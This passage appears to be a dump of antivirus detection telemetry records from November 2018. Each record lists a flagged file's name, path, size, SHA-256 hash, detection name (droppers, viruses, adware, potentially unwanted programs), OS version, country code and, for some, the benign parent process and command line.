  Row(detection=Row(filename='464wqw3az.exe', filepath='\\?\\C:\\Program Files\\E8NHFAYPF0\\464WQW3AZ.exe', filesize=1088000, name='ADWARE/Wizrem.Gen7.#M300.#R603867'), hash='caaa9dbbd9f4903b95dcdf3950a0a123bdb438e849495b7deaa8c08e32d2a1e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\72A55FB04DF96203C636A52AA2824C07558E785BE34E646FE3749EE2A19EB26B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='72a55fb04df96203c636a52aa2824c07558e785be34e646fe3749ee2a19eb26b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='poweriso 6.6 and serial key.exe', filepath='C:\\Users\\X\\Desktop\\nera\\# (installer prog. base)\\# (creare file iso)\\PowerISO\\PowerISO 6.6 and Serial Key\\PowerISO 6.6 and Serial Key.exe', filesize=6144000, name='HEUR/AGEN.1011383.#M1.#R1'), hash='e06e83b21a0aab3d0107dd1bc2fe903113726aa2a0277e66e300374a30008706', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=280576, timestamp='2018-11-02T15:10:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ep44ot8k.exe', filepath='\\\\?\\C:\\Program Files\\AWOOOMLMR5\\7EP44OT8K.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:18:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nizjjkvk.exe', filepath='c:\\users\\X\\appdata\\roaming\\nizjjkvk.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T16:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oiomhpbv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\OiomhPBv.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jlke9pjqne.exe', filepath='f:\\jlke9pjqne.exe', filesize=5056000, name='HEUR/APC.#M1.#R1'), hash='fbcac9590f9e5f3e2a8e55a4ccdd9e318c39a1890b033e450ef311233924e63c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:11:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='fcacdeeecabea03fd1d2a9e924a85f96d0fed56f05c38b3f85fc7e84f222c600', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kvutoxn.exe', filepath='c:\\users\\X\\appdata\\roaming\\kvutoxn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=454656, timestamp='2018-11-02T16:17:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Sengketa tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='f4ed476dd0bb7b9fc35c8c2334e1404d3b70ce957bdfb9884fd8e4b865e95cef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:12:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175154-c8be9e84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175154-C8BE9E84', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gclaw.exe', filepath='D:\\العاب حسين\\Claw\\gCLAW.EXE', filesize=1472000, name='W32/Sality.AT.#M1.#R1'), hash='f82c8ecd9f5b050b902d7d15f483d434b236ef766cfc036febb2fdc28d6de746', metadata=Row(cmdline='-m:GeneralTel.dll -f:RunGeneralTelemetry  -cV qf7c4+YHUU2SUy4e.1.1 -SendFullTelemetry -ThrottleUtc -FullSync', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-02T12:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sahara india.exe', filepath='G:\\\xa0\\sahara india\\sahara india.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:36:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\bvfznilw4xq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='GY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=5073376, timestamp='2018-11-02T16:11:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.pzirj.#M0.#R0'), hash='b96ac87412ee267e996e5becb9886b375b03ba199a90badcfc81ca247b513d41', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:56:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eset nod32 antivirus 2018 crack license key.exe', filepath='G:\\ESET NOD32 ANTIVIRUS 2018 CRACK LICENSE KEY.EXE', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='cd19a1613937f7a5122a4248ddab7e2efb80d8b5ce073e75d8845bfad91163e7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4674872, timestamp='2018-11-02T13:42:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='e382b2754e9d655c30e73005ff3bdae57ca33692baa8bb3d26b327d341bd1067', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T15:39:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-212604-2ccf6005', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-193530-FBC0A5CA\\AVSCAN-20181101-212604-2CCF6005', filesize=64000, name='TR/Crypt.XPACK.Gen2.#M300.#R100420'), hash='c3f3ba19bedc965c2885dfb09a210f95b83ad33bfc4545cd8ec07062ae42adac', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-092754-d8a02a10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_573a0902\\AVSCAN-20181102-081308-6BB2B467\\AVSCAN-20181102-092754-D8A02A10', filesize=384000, name='TR/Crypt.XPACK.279549.#M1.#R1'), hash='bcbd5418fcf362b739fb4aa91f7a5a82aa472e6edbd0b97c99f22a6c8f9bf97d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tdma.exe', filepath='\\\\?\\F:\\CD PARA QUEMAR\\SOFTWARE 2\\Otros Flasher\\Nokia\\Nokia - Tdma&Cdma Unlocker\\Tdma.exe', filesize=1152000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100761'), hash='90c0e832cd6135064f4e7f24643c2b2d93f5d58da239f0b761133c5e77c97f54', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T00:12:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165150-e55755b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83ad264b\\AVSCAN-20181102-164620-B3822C26\\AVSCAN-20181102-165150-E55755B3', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='aad33d366186a6aa81e97c90af4d24dde314733425a12a6080d83a1bb17203d1', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:51:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\fqfhjlahjbg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1541083803.5bdb129b71b56', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Free\\225392171.exe', parentsize=671232, timestamp='2018-11-02T07:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fapsetup.exe', filepath='H:\\download\\fap-ceo-dl_Windows_7_1_06\\FapSetup.exe', filesize=12288000, name='TR/Fraud.Gen2.#M300.#R100569'), hash='a61dc88eba4c28a370b5c41f51caf57904f309cca4959a6c7dc4d5f47e39c167', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T05:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023bf09', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023bf09', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:25:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239057', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239057', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-175239-35aaf025', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-163940-91208DC2\\AVSCAN-20181104-175239-35AAF025', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='f34c41752243de42a9999f10d86bcf841eb7690fcfd397f3bf0d94612e910222', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:52:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl142.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl142.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F970770BCC81D2CD755852FE59A587CAA2D16F5EC03A7877E56650CDEF4754EF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:00:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\CAE108464DD278B34F958DBB74FFEFE382EF99E74B048BB4AE1BE95671688A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae108464dd278b34f958dbb74ffefe382ef99e74b048bb4ae1be95671688a2f', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:34:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f161', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f161', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:12:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dragonbar.exe', filepath='C:\\Program Files (x86)\\Common Files\\Nuance\\NaturallySpeaking13\\dragonbar.exe', filesize=744000, name='W32/Neshta.A.#M1.#R1'), hash='bdab58f930629b5387c13e67c2f21ad957de9229cd22437f4f22fece9c80c0be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fcbc', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fcbc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:21:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b682', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b682', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:16:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002925ec', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002925ec', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:10:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsw6941.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-04T00:13:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsx7C7C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T13:49:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='$r3o45l3', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R3O45L3', filesize=64000, name='VBA/Dldr.Agent.skjle.#M1.#R1'), hash='f150aa908aa923ddefe5a935d2c39ac3752a9b1dbf816f5a680512aebebed9de', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F45FF775783693214A5454F7D42964328450C655C1E295A27F9EBF608767DB24', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='f45ff775783693214a5454f7d42964328450c655c1e295a27f9ebf608767db24', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:40:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FEE5DE47656A3DC8E5E7265FC2B99F61DB429F9311E5B2C87E1011988B705753', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fee5de47656a3dc8e5e7265fc2b99f61db429f9311e5b2c87e1011988b705753', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:46:21Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-071234-c8e62dbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1aa4042c\\AVSCAN-20181102-071218-C74276CA\\AVSCAN-20181102-071234-C8E62DBB', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='0cd834eaeccc8ef4ac62b7b9a14d7a0270bfbecc774c8387cdf720bcaa3f32fa', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iddbas32.dll', filepath='C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\iddbas32.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0815476a461c413fa908b96aa5c2821aeb7b3a2abce3f4f5b118bbe6c514f1d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\360se6\\Application\\360se.exe', parentsize=1190912, timestamp='2018-11-02T08:57:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:27Z'), dt=datetime.date(2018, 11, 2)),
